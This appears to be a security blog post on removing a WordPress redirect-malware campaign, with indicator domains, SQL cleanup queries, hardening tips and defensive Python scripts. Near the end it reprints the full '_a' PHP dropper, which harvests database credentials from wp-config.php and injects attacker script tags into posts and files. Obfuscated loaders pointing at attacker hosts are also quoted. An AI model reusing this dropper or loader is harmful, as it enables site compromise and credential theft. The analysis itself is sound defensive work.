Malware served from the domains mono.declarebusinessgroup.ga, solo.declarebusinessgroup.ga, declarebusinessgroup.ga, trendopportunityfollow.ga, sinistermousemove.art and lowerbeforwarden.ml is infecting many WordPress sites

This is a redirect malware campaign: the attacker inserts a JavaScript loader into every post and page, and when visitors open the site that script redirects them to scam pages. This class of attack is a JavaScript injection.

If you are looking for a professional who can remove the malware from your website permanently, check out my gig on Fiverr.


We are a cyber security agency and have recently received a number of requests to fix hacked WordPress websites. Common indicators of this malware, such as solo.declarebusinessgroup.ga and lowerbeforwarden.ml, are listed below. Have a look at them, and get in touch with us if you want us to clean your site.


Common indicators of the lowerbeforwarden.ml malware family (domains, script URLs and file names)

  1. js.donatelloflowfirstly.ga
  2. js.donatelloflowfirstly.ga/statistics.js?n=ns1
  3. scripts.lowerbeforwarden.ml
  4. scripts.lowerbeforwarden.ml/src.js?n=ns1
  5. source.lowerbeforwarden.ml
  6. directednotconverted.ml
  7. temp.lowerbeforwarden.ml/det.php
  8. rms_unique_wp_mu_pl_fl_nm.php
  9. location.lowerbeforwarden.ml
  10. go.donatelloflowfirstly.ga
  11. 0.directednotconverted.ml
  12. trendopportunityfollow.ga
  13. solo.declarebusinessgroup.ga
  14. sinistermousemove.art
  15. mono.declarebusinessgroup.ga
  16. declarebusinessgroup.ga
  17. bono.declarebusinessgroup.ga
  18. http://mono.declarebusinessgroup.ga/m.js

We have cleaned almost all of these websites and are writing this article to show how you can get your website back if it is infected by this malware or a similar one.


How to check for the declarebusinessgroup.ga and sinistermousemove.art malware

If your site redirects visitors to unrelated, spammy-looking pages, this malware may be present.

Check the public_html (document root) directory of your site: you may find a file named _a. It is a PHP dropper (its full content is reproduced at the end of this article) that injects the following script tags:

<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
<script src='https://sinistermousemove.art/src.js?n=ns1' type='text/javascript'></script>
<script src='https://solo.declarebusinessgroup.ga/temp.js?n=ns1' type='text/javascript'></script>
<script type='text/javascript' src='https://mono.declarebusinessgroup.ga/m.js?n=nb5'></script>
<script type='text/javascript' src='https://bono.declarebusinessgroup.ga/m.js?n=nb5'></script>

The _a file does not merely contain these script tags: it reads the database login details from wp-config.php and uses them to append the tag to post content, and its helper functions prepend the same loader to index.php files, theme files (commenters found it in header.php) and .js files.
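A quick triage script for the indicators in this section, added here as an example and not part of the original article: it walks a site tree and flags the dropper file names in the document root, PHP files in wp-content/mu-plugins, files that contain one of the listed domains or the obfuscated loader's signature, and world-writable files (the dropper runs chmod 777 on the files it modifies). The site tree it scans is a constructed fixture built in a temporary directory; point scan_site() at your real document root instead.

```python
"""Triage scan for the redirect-injection indicators described above.

Added example (not the article's own tooling). Flags:
  * dropper-style files in the document root (_a, _f, _2, lte_*),
  * PHP files under wp-content/mu-plugins (e.g. rms_unique_wp_mu_pl_fl_nm.php),
  * files containing a listed domain or the obfuscated loader's signature,
  * world-writable files (the dropper runs chmod 777 on what it modifies).
The sample site tree is a constructed fixture so the script runs offline.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicator domains taken from the list in the article.
IOC_DOMAINS = (
    "donatelloflowfirstly.ga", "lowerbeforwarden.ml", "directednotconverted.ml",
    "trendopportunityfollow.ga", "declarebusinessgroup.ga", "sinistermousemove.art",
)
DROPPER_NAMES = re.compile(r"^(_a|_f|_2|lte_.*)$")
# The appendAfter prototype patch and the char codes of "script" are stable
# across the obfuscated variants, unlike the domain, which is encoded.
LOADER_SIGNATURES = (
    "Element.prototype.appendAfter",
    "String.fromCharCode(115,99,114,105,112,116)",
)
TEXT_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_site(root):
    """Walk `root` and return sorted (reason, relative_path) findings."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.parent == root and DROPPER_NAMES.match(path.name):
            findings.add(("dropper-name", rel))
        if path.suffix == ".php" and "wp-content/mu-plugins/" in rel:
            findings.add(("mu-plugin", rel))
        if path.stat().st_mode & stat.S_IWOTH:
            findings.add(("world-writable", rel))
        if path.suffix in TEXT_SUFFIXES:
            text = path.read_text(errors="replace")
            if any(domain in text for domain in IOC_DOMAINS):
                findings.add(("ioc-domain", rel))
            if any(sig in text for sig in LOADER_SIGNATURES):
                findings.add(("obfuscated-loader", rel))
    return sorted(findings)


def _write(path, text, mode=0o644):
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)
    os.chmod(path, mode)  # explicit mode so the fixture does not depend on umask


def build_sample_site():
    """Constructed fixture imitating an infected install (hypothetical content)."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    _write(root / "index.php",
           "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>"
           "<?php require __DIR__ . '/wp-blog-header.php';")
    _write(root / "_a", "<?php echo 'ssqqss>>>';")
    _write(root / "wp-content" / "mu-plugins" / "rms_unique_wp_mu_pl_fl_nm.php",
           "<?php /* remote access stub */")
    _write(root / "wp-includes" / "js" / "jquery.min.js",
           "Element.prototype.appendAfter = function(element) {};/* jquery */", mode=0o777)
    _write(root / "wp-settings.php", "<?php // clean core file")
    return root


if __name__ == "__main__":
    for reason, rel in scan_site(build_sample_site()):
        print(f"{reason:18} {rel}")
```

Run it against a copy of the site taken before cleanup: a finding under "world-writable" or "mu-plugin" with no matching "ioc-domain" hit is exactly the kind of file a domain-name search misses.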


How to clean the declarebusinessgroup.ga and sinistermousemove.art malware from a WordPress site

1. Remove the dropper files that insert the script

Create a backup of your whole site, including the database, before changing anything; a copy of the infected state is also the evidence you will want if the infection returns.

First, delete the _a, _f, _2, lte_ and similar files from your site's home (public_html) directory.

2. Remove unwanted PHP files from the mu-plugins directory

Must-use plugins in wp-content/mu-plugins are loaded on every request and do not appear in the normal plugin list, which is why this campaign drops its backdoor there. Delete any file in that folder that you did not put there yourself; in this campaign it is usually named rms_unique_wp_mu_pl_fl_nm.php.


3. Clean the bono.declarebusinessgroup.ga and sinistermousemove.art redirecting scripts from the database

  1. Now clean the database.
  2. Go to phpMyAdmin, choose the right database and run the following SQL query to remove the script from the wp_posts table. Change the script string to the exact one you identified in your case (the attribute order and the ?n= parameter vary between variants).
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://mono.declarebusinessgroup.ga/temp.js?n=ns1' type='text/javascript'></script>", ""));

You may need to adjust the query for the malware domain and for your MySQL configuration: if your table prefix is not wp_, use your own prefix, and type the quotes yourself rather than pasting them from a web page, because typographic quotes (“ ”) are not string delimiters in MySQL and produce the #1064 syntax error that several readers report in the comments below.

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src='https://bono.declarebusinessgroup.ga/m.js?n=nb5'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://sinistermousemove.art/src.js?n=ns1' type='text/javascript'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));

This method also works for the related variants; just change the domain name accordingly. Check other tables that hold HTML, such as wp_postmeta, in the same way (wp_options is covered in the next step):

  • *.donatelloflowfirstly.ga
  • js.donatelloflowfirstly.ga
  • go.donatelloflowfirstly.ga
  • lowerbeforwarden.ml
  • source.lowerbeforwarden.ml
  • scripts.lowerbeforwarden.ml
  • location.lowerbeforwarden.ml
  • temp.lowerbeforwarden.ml
  • 0.directednotconverted.ml
  • trendopportunityfollow.ga
  • solo.declarebusinessgroup.ga
  • sinistermousemove.art
  • mono.declarebusinessgroup.ga
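The REPLACE() queries above remove one exact string each, and the injected tag varies between variants (src before type or after it, ?n=ns1 or ?n=nb5, js./solo./mono./bono./scripts. as the host). The following Python function, added here as an example and not part of the original article, removes every variant for the listed domains with a single regular expression and also strips the obfuscated inline loader; the sample rows are constructed. The same two patterns can be used in SQL with REGEXP_REPLACE() on MySQL 8 or MariaDB 10.0.5+, in which case run the SELECT form first and check what it matches before running the UPDATE.

```python
"""Strip the injected <script> tags from WordPress post_content.

Added example, not part of the original article. Handles both forms seen in
this campaign: the plain external tag (any attribute order, any host under an
indicator domain, any ?n= parameter) and the obfuscated inline loader that
starts with the Element.prototype.appendAfter prototype patch.
"""
import re

# Indicator domains taken from the list in the article.
IOC_DOMAINS = (
    "donatelloflowfirstly.ga", "lowerbeforwarden.ml", "directednotconverted.ml",
    "trendopportunityfollow.ga", "declarebusinessgroup.ga", "sinistermousemove.art",
)
_DOMAIN_ALT = "|".join(re.escape(d) for d in IOC_DOMAINS)

# <script ... src='https://<host>.<ioc-domain>/...' ...></script>, attributes in any order.
PLAIN_TAG = re.compile(
    r"<script\b[^>]*\bsrc=['\"]https?://(?:[\w.-]+\.)?(?:%s)/[^'\"]*['\"][^>]*>\s*</script>"
    % _DOMAIN_ALT,
    re.IGNORECASE,
)
# Inline loader: the body begins with the appendAfter prototype patch.
LOADER_TAG = re.compile(
    r"<script\b[^>]*>\s*Element\.prototype\.appendAfter\s*=.*?</script>",
    re.IGNORECASE | re.DOTALL,
)


def strip_injected_scripts(content):
    """Return (cleaned_content, number_of_tags_removed)."""
    cleaned, n_plain = PLAIN_TAG.subn("", content)
    cleaned, n_loader = LOADER_TAG.subn("", cleaned)
    return cleaned, n_plain + n_loader


def clean_rows(rows):
    """rows: iterable of (ID, post_content). Returns [(ID, new_content)] for changed rows only."""
    changed = []
    for post_id, content in rows:
        cleaned, removed = strip_injected_scripts(content)
        if removed:
            changed.append((post_id, cleaned))
    return changed


# Constructed sample rows (hypothetical data, not taken from a real database).
SAMPLE_ROWS = [
    (1, "<p>Hello world</p><script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>"),
    (2, "<p>Post</p><script type='text/javascript' src='https://bono.declarebusinessgroup.ga/m.js?n=nb5'></script>"),
    (3, "<p>Clean</p><script src='https://example.com/app.js'></script>"),
    (4, "<script type=text/javascript> Element.prototype.appendAfter = function(element) "
        "{element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { "
        "var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); })();"
        "</script><p>Body</p>"),
]

if __name__ == "__main__":
    for post_id, new_content in clean_rows(SAMPLE_ROWS):
        print(post_id, repr(new_content))
```

Row 3 keeps its legitimate script tag, which is the reason to anchor the pattern on the indicator domains rather than on `<script` alone. Apply the result with an UPDATE per changed ID inside a transaction, after a fresh dump of the table.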

You can email me about any issues or errors: [email protected]


4. Check and restore the original URLs in the wp_options table

Remove the sinistermousemove.art and mono.declarebusinessgroup.ga URLs from the wp_options table.

Check the siteurl and home rows in wp_options and make sure both hold your real site address. A changed value here is the main reason the site redirects you to other pages as soon as you open it, sometimes to pages that ask you to confirm your identity again and again.

Now clear your website cache (including any page-cache plugin and CDN cache) and check from a new browser or an incognito window; the redirect should be gone.


5. Clean all index.php files

Check every index.php file (in the root, wp-content, themes and plugins) and verify that none of them contains a script tag pointing at sinistermousemove.art or any of the other domains listed above.

6. Replace the WordPress core files

The easiest way to replace the core files is Dashboard -> Updates -> "Re-install version x.y". If you have shell access, WP-CLI's wp core verify-checksums lists every core file that differs from the official release, which tells you whether this step is needed and which files were touched.

If you are not able to log in to the WordPress admin dashboard, the manual method below works fine.

Manually replace (overwrite) all WordPress core files, excluding the wp-content folder:

  1. Download the latest WordPress version from wordpress.org.
  2. Unzip it and delete wp-content from the extracted folder.
  3. Zip it again.
  4. Upload the zip to the root directory of your website.
  5. Once uploaded, extract the files.
  6. Navigate to the folder where the core files were extracted; the folder name matches the zip file name (normally wordpress).
  7. Select all and move it to the root folder. If it asks to overwrite, answer yes.
  8. Done. Your WordPress core files are now clean. Remember that this does not touch wp-content (themes, plugins, uploads, mu-plugins), which is where the backdoor lives; steps 2 and 7 cover that.

7. Replace themes and plugins if needed

Delete the currently active theme folder from wp-content/themes and upload a fresh copy: once the active theme is deleted, upload the theme zip file into the same directory and extract it, then delete the zip. Commenters found the injected tag in header.php and the loader in the theme's .js files, so a fresh copy is safer than editing by hand; if you customised the theme directly (rather than via a child theme), diff your copy against the fresh download first so you do not lose those changes.

If you have a child theme activated, make sure to upload and extract it again as well.

Also delete all unused themes from wp-content/themes, and do the same for plugins: delete (not just deactivate) every plugin and re-upload clean copies from the official repository or the vendor, never from a "nulled" source.


If you need a professional's help to clean malware from your site, with a guarantee that it will not come back:

1. You can place an order on Fiverr.

2. You can place a direct order by sending $50 via PayPal and we will contact you: link
(mention your email in the description)

3. For India: link

(We remove the malware using advanced tools, and the infection will not come back.)

Thank you


Be safe: tighten the security of your WordPress site

Disallow file editing

A user with admin access to your WordPress dashboard can edit any file that is part of your installation, including all plugins and themes, through the built-in file editor.

If you disallow file editing, that editor is removed, so an attacker who obtains admin access cannot drop PHP into a theme or plugin file from the dashboard. (It does not stop the upload of a plugin or theme zip; the DISALLOW_FILE_MODS constant covers that, at the cost of disabling dashboard updates.)

To make this work, add the following to wp-config.php, above the line that reads /* That's all, stop editing! */:

define('DISALLOW_FILE_EDIT', true);

Only install trusted WordPress plugins and themes

Remove unused plugins and themes

Install a WordPress security plugin

Installing a WordPress security plugin is a straightforward way to improve the security of your site. To be more proactive against threats, install a plugin such as one of the following to reduce your exposure:

Sucuri Security

Secure the wp-config file

The wp-config.php file contains your website's base configuration, including the database credentials that the _a dropper harvests. To stop it from being served directly, add the following to your .htaccess file (Apache only; nginx does not read .htaccess, so there the file has to be blocked in the server configuration instead). The inner blocks cover the Apache 2.4 and 2.2 syntaxes:

<Files wp-config.php>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Deny from all
  </IfModule>
</Files>

Note that this only blocks HTTP requests for the file; a PHP script running under the same account, such as _a, can still read it.

Use more secure hosting

On shared hosting your site can be re-infected from another account on the same server that still contains a backdoor, if the host does not isolate accounts properly; note that the _a dropper walks several directory levels above the document root looking for wp-config.php files. A VPS of your own avoids that.

I recommend a dedicated VPS from DigitalOcean or AWS; you can get one for as little as $5 per month.

Periodically review file changes

You can use a security plugin to keep track of file changes; any change to a core, theme or plugin file that you did not make yourself is a signal.

Change the password of your database user and update wp-config.php with the new value. The _a dropper reads DB_PASSWORD from wp-config.php, so treat the old password as compromised, and change the WordPress admin, hosting panel and FTP/SSH passwords at the same time.

Clean other core files

There are many ways to clean your WordPress files. Here is mine:

1) Zip all the site files and download the zip file to your desktop.

2) Unzip the files into a folder, "txnkaro" as an example.

3) Go to the folder wp-content/plugins and delete all plugins, then put clean copies of the plugins into the folder. Do the same with the themes: delete all themes and replace them with clean copies.

4) Install the VSCode editor; you can download it at https://code.visualstudio.com/.

5) Open the txnkaro (example) folder in VSCode, then use Edit > Search in the files to search for the keywords donatelloflowfirstly and Element.prototype.appendAfter (the obfuscated form does not contain the domain name). Only a few files should be found, since we have deleted all cached files and replaced all themes and plugins. Edit those files if you know how, or just replace them with clean files.

6) All files should be clean now. Delete your whole site and upload this clean copy to the site folder. Your site should be OK.

There is another way to clean the files if you can log in to the site's admin panel: install the Wordfence plugin and scan the whole site. Wordfence will find the injected files; just edit them or replace them with clean files.

Now clear your website's cache files and your browser cache, and check that the malware is gone.


New obfuscated versions of the declarebusinessgroup.ga and lowerbeforwarden.ml malware

Recently the attackers started inserting an obfuscated version of the loader. It is not encrypted: every string is spelled out as String.fromCharCode() character codes so that a plain search for the domain name does not find it. The dropper places it right after <head> or just before </head> in PHP and HTML files and prepends it to .js files, which is why the first sample below ends with </head>. The reliable search string for this form is Element.prototype.appendAfter.

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,111,108,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

Decoded, the two loaders read as follows (string literals restored; the second differs from the first only in its src). Each one creates a script element pointing at the attacker's host and inserts it after the first script tag and into the head, so the redirect code is fetched on every page view:

<script type=text/javascript>
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement('script');
    elem.type = 'text/javascript';
    elem.src = 'https://js.donatelloflowfirstly.ga/stats.js';
    elem.appendAfter(document.getElementsByTagName('script')[0]);
    elem.appendAfter(document.getElementsByTagName('head')[0]);
    document.getElementsByTagName('head')[0].appendChild(elem);
})();
</script></head>
<script type=text/javascript>
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement('script');
    elem.type = 'text/javascript';
    elem.src = 'https://solo.declarebusinessgroup.ga/temp.js';
    elem.appendAfter(document.getElementsByTagName('script')[0]);
    elem.appendAfter(document.getElementsByTagName('head')[0]);
    document.getElementsByTagName('head')[0].appendChild(elem);
})();
</script>
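The loader is only obfuscated, so it can be read without executing it. The following script, added here as an example and not part of the original article, substitutes each String.fromCharCode(...) call with the literal it encodes and extracts the src URL; the two sample strings are the loaders quoted above.

```python
"""Decode the String.fromCharCode() loader quoted above.

Added example (not from the article). The loader is obfuscated, not encrypted:
each string literal is written as a list of character codes. This replaces
every String.fromCharCode(...) call with the decoded literal and pulls out the
src URL, so the indicator domain can be read without running the JavaScript.
"""
import re

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_fromcharcode(js):
    """Return `js` with every String.fromCharCode(...) replaced by a quoted literal."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return repr("".join(chr(c) for c in codes))
    return FROMCHARCODE.sub(repl, js)


def loader_src(js):
    """Return the URL assigned to .src in a decoded (or plain) loader, else None."""
    match = re.search(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", decode_fromcharcode(js))
    return match.group(1) if match else None


# The two loaders quoted on the page (the trailing </head> of the first is omitted).
SAMPLE_1 = (
    "<script type=text/javascript> Element.prototype.appendAfter = function(element) "
    "{element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { "
    "var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); "
    "elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); "
    "elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,"
    "101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);"
    "document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"
)
# Second sample: identical loader, only the encoded src differs.
SAMPLE_2 = SAMPLE_1.replace(
    "106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115",
    "115,111,108,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,116,101,109,112,46,106,115",
)

if __name__ == "__main__":
    print(decode_fromcharcode(SAMPLE_1))
    print(loader_src(SAMPLE_1), loader_src(SAMPLE_2))
```

Feed loader_src() the contents of every file that your search for Element.prototype.appendAfter returned; a new host that is not yet on the indicator list shows up immediately.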


Backdoor: why does this type of attack happen?

Most probably nulled plugins and themes cause this type of malware injection, so remove every theme and plugin you downloaded from an unauthorised source.

Other reasons:

  • Not updating your themes and plugins for a long time
  • Missing major WordPress core releases
  • Using a nulled or cracked theme or plugin on your website
  • Not having disabled xmlrpc.php for public users


Here is the content of the _a malware file. Read top to bottom: the script prints a marker (ssqqss>>>), calls search_file_ms() starting eight directory levels above the document root, and then dies; everything after the die() is function definitions. search_file_ms() walks the tree looking for wp-config.php (on shared hosting that reaches every readable wp-config.php of the other accounts), show_sitenames() pulls DB_NAME, DB_HOST, DB_USER and DB_PASSWORD out of each one with regular expressions, connects with mysqli, and appends the js.donatelloflowfirstly.ga script tag to post_content in every table whose name contains "post" and does not already carry it. This is why the tag appears in every post and page, and why rotating the database password is part of the cleanup. The remaining functions (search_file, search_file_index and search_file_js with their make_it* helpers) are not called in this copy but show the file-side variants: they chmod the target to 777, prepend the plain tag to index files, insert the obfuscated loader after <head> or before </head> in .php and .htm files, and prepend the loader to every .js file. One bug in the dropper's own code is worth knowing: make_it_index() tests $g before assigning it, so its "already infected" check never fires and it re-injects on every run.

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors',1);


search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","wp-config.php");
die();


function get_var_reg($pat,$text) {

if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}

return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_ms( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){


$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {

show_sitenames($path);



}

} else if($value != "." && $value != "..") {

@search_file_ms($path, $file_to_search);

}
}
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {


$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {

} else {


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "js.donatelloflowfirstly.ga") === false){
if(strpos($val, "js.donatelloflowfirstly.ga") === false){


$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];

} else {

}

}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it($path);

} }else if($value != "." && $value != "..") {

search_file($path, $file_to_search);

}
}

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

search_file_index( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it_index($path);

} }else if($value != "." && $value != "..") {

search_file_index($path, $file_to_search);

}
}

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_js( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

make_it_js($path);

} }else if($value != "." && $value != "..") {

search_file_js($path, $file_to_search);

}
}

}

function make_it_js($f){
$g = file_get_contents($f);



if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."\r\n";
}


}
function make_it_index($f){

if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false || strpos($g, 'js.donatelloflowfirstly.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";


}
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}


}
}

If you need a professional's help to clean the malware and restore your site, you can email me: [email protected]

44 Comments

  • Trish says:

The _2 file is deleted, but the code is still showing and the website is redirecting to weird spamming websites.

  • Waikey says:

    The same problem happened to my blog! Here are my steps:
    1. Read the _a file and found out that this file searches all the JS files and index files, then injects the code into those files!
    2. Installed Wordfence and scanned all the files; found out that almost all the themes' and plugins' JS / index files had been injected.
    3. Deleted all plugins and themes (not deactivated, deleted), then uploaded clean files.
    4. Scanned again, and edited some missed files.
    5. Logged in to phpMyAdmin and ran the SQL command to remove the code injected into the content.
    6. Checked all plugins and deactivated 2 of them. It's a shame, since I used nulled plugins.
    May I ask what plugins your friends used?

  • Yadley says:

    After endlessly digging online for a practical solution to this attack, this post seems to be the only one coming to the rescue. Thank you very much for this piece of information. Just one small issue though; here's what we're getting when we try to clean the DB per your specification:
    Static analysis:
    1 errors were found during analysis.
    Variable name was expected. (near “?” at position 115)
    SQL query:
